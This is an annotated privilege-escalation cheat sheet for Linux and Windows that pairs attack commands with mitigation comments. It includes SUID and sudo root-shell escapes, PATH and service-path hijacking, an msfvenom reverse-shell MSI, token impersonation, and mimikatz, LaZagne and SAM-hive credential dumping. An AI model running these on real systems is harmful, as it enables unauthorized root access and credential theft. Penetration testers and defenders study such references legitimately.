Privilege Escalation
Linux Privilege Escalation
Enumeration Scripts
# LinPEAS
# NOTE(review): this pipes an unpinned ("latest") download straight into a shell with
# no checksum or review; fetch the release to a file, verify it against the published
# checksum and read it before running it.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./linenum.sh
# Linux Smart Enumeration
# -l 1 raises lse's output level above the default 0 (per lse's own help text)
./lse.sh -l 1
# Linux Exploit Suggester
./linux-exploit-suggester.sh
Manual Enumeration
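# System information
uname -a
cat /etc/issue
cat /etc/*-release
# Current user
id
whoami
groups
# Sudo permissions
# lists the sudoers rules that apply to the current user; may prompt for a password
sudo -l
# SUID binaries
# the two forms are equivalent (-4000 and -u=s both test the setuid bit);
# 2>/dev/null hides the permission-denied noise of a full-filesystem walk
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Writable files
# -writable asks whether the CURRENT user can write the file (owner, group or ACL);
# -perm -222 matches only files whose mode has the write bit for user, group AND
# other — the two listings are not the same.
find / -writable -type f 2>/dev/null
find / -perm -222 -type f 2>/dev/null
# World-writable directories
# as above, -writable means writable by the current user; the strict world-writable
# test is -perm -o+w
find / -writable -type d 2>/dev/null
# Running processes
ps aux
ps -ef
# Network connections
# netstat is often absent on current distros; ss gives the same listening-socket view
netstat -antup
ss -tulpn
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
# crontab -l shows only the invoking user's own crontab
crontab -l
# Installed packages
# distro-specific: dpkg on Debian/Ubuntu, rpm on Red Hat/CentOS (the notes are
# comments here so the lines are valid commands)
dpkg -l   # Debian/Ubuntu
rpm -qa   # Red Hat/CentOS
# Environment variables
env
echo $PATH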
Common Techniques
SUID Exploitation
# GTFOBins - Check for SUID exploits
# https://gtfobins.github.io/
# Mitigation: remove the setuid bit (chmod u-s) from anything that does not need it;
# the find -perm -4000 listing above is the audit, GTFOBins is the triage list.
# Example: find
find . -exec /bin/sh -p \; -quit
# Example: vim
vim -c ':!/bin/sh'
# Example: nmap (old versions)
# --interactive no longer exists in current nmap releases, hence "old versions";
# the !sh line is typed at the nmap> prompt, not in the shell.
nmap --interactive
!sh
Sudo Exploitation
# Check sudo version
sudo -V
# Exploit sudo < 1.8.28 (CVE-2019-14287)
# only affects builds before 1.8.28, where the fix landed; updating sudo is the
# mitigation, and a patched build should reject the -u#-1 form outright.
sudo -u#-1 /bin/bash
# GTFOBins for sudo
# https://gtfobins.github.io/
Capabilities
# Find capabilities
# getcap -r walks the whole filesystem; 2>/dev/null hides permission-denied noise
getcap -r / 2>/dev/null
# Example: python with cap_setuid
# cap_setuid on an interpreter is as dangerous as a root-SUID copy of it (the
# os.setuid(0) below is why); mitigation is setcap -r on binaries that do not need it.
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Path Hijacking
# Check PATH
echo $PATH
# Create malicious binary
# Mitigation: privileged scripts and cron jobs should call programs by absolute path
# and set PATH explicitly instead of inheriting the caller's; a bare "ls" resolved
# through a caller-controlled PATH is what this technique relies on.
echo '#!/bin/bash\n/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
Kernel Exploits
# Check kernel version
uname -a
# Search for exploits
# searchsploit queries the local Exploit-DB copy by version string; distro kernels
# backport fixes without bumping the number, so a version-only hit is not proof of
# exposure. Mitigation is keeping the kernel current.
searchsploit linux kernel 4.4
Windows Privilege Escalation
Enumeration Scripts
# WinPEAS
.\winPEASany.exe
# PowerUp
# -ep bypass (ExecutionPolicy Bypass) applies to this process only; execution policy
# is not a security boundary, and the switch is a common command-line-logging signal.
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt
# -group=all runs every Seatbelt check group; expect a lot of output
.\Seatbelt.exe -group=all
# Windows Exploit Suggester
# --database is the MS security-bulletin spreadsheet (its file name is the snapshot
# date); --systeminfo takes the saved output of the systeminfo command.
python windows-exploit-suggester.py --database 2021-09-01-mssb.xls --systeminfo systeminfo.txt
Manual Enumeration
# System information
systeminfo
hostname
# /all includes group memberships and privileges (SeImpersonatePrivilege etc.)
whoami /all
# User information
net user
net user <username>
net localgroup administrators
# Network information
ipconfig /all
# -ano: all sockets, numeric addresses, owning PID (pair with tasklist below)
netstat -ano
route print
# Scheduled tasks
schtasks /query /fo LIST /v
# Running processes
tasklist /v
wmic process list full
# Services
sc query
wmic service list brief
# Installed software
# wmic is deprecated on current Windows releases and may be missing; "wmic product"
# also makes Windows Installer re-validate every package, so it can be slow.
wmic product get name,version
dir "C:\Program Files"
dir "C:\Program Files (x86)"
# File permissions
icacls "C:\path\to\file"
# Registry
# Run keys: machine-wide (HKLM) and current-user (HKCU) autostart entries
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Common Techniques
Unquoted Service Paths
# Find unquoted service paths
# keeps auto-start services whose image path is outside C:\Windows; the last
# findstr /v """ drops paths that are already quoted.
wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Exploit
sc qc <service_name>
# Place malicious executable in unquoted path
# Mitigation: quote the service's BinaryPathName and deny write access to every
# directory along it.
Weak Service Permissions
# Check service permissions
sc qc <service_name>
icacls "C:\path\to\service.exe"
# Modify service binary path
# binpath= rewrites the service's image path. Mitigation: a service ACL that does not
# grant change-config rights to unprivileged users (sc sdshow <service_name> shows
# it) and a binary directory they cannot write to.
sc config <service_name> binpath= "C:\path\to\malicious.exe"
sc start <service_name>
AlwaysInstallElevated
# Check registry
# the policy takes effect only when the value is 1 in BOTH hives; mitigation is
# leaving it unset (or 0) in both.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Create malicious MSI
# <IP>/<PORT> are placeholders for the listener
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o malicious.msi
# Install
msiexec /quiet /qn /i malicious.msi
Token Impersonation
# Incognito (Meterpreter)
# the next three lines are Meterpreter console commands, not Windows shell commands
use incognito
list_tokens -u
impersonate_token "DOMAIN\\User"
# PrintSpoofer (SeImpersonatePrivilege)
# PrintSpoofer and JuicyPotato both require SeImpersonatePrivilege (whoami /priv);
# mitigation is keeping that privilege off service accounts that do not need it.
.\PrintSpoofer.exe -i -c cmd
# Juicy Potato
# {CLSID} is a placeholder for a DCOM class id
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
Credential Harvesting
# Mimikatz
# the privilege::/sekurlsa:: lines are mimikatz console commands; privilege::debug
# enables SeDebugPrivilege so lsass can be read. Detection/mitigation: LSA protection
# (RunAsPPL) and Credential Guard block or limit this, and lsass access is a
# high-value monitoring event.
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
# LaZagne
.\lazagne.exe all
# Registry
# saving the SAM and SYSTEM hives needs administrator rights; SYSTEM holds the key
# that protects SAM, which is why the two are taken together.
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
Useful Links
Linux Privilege Escalation
Windows Privilege Escalation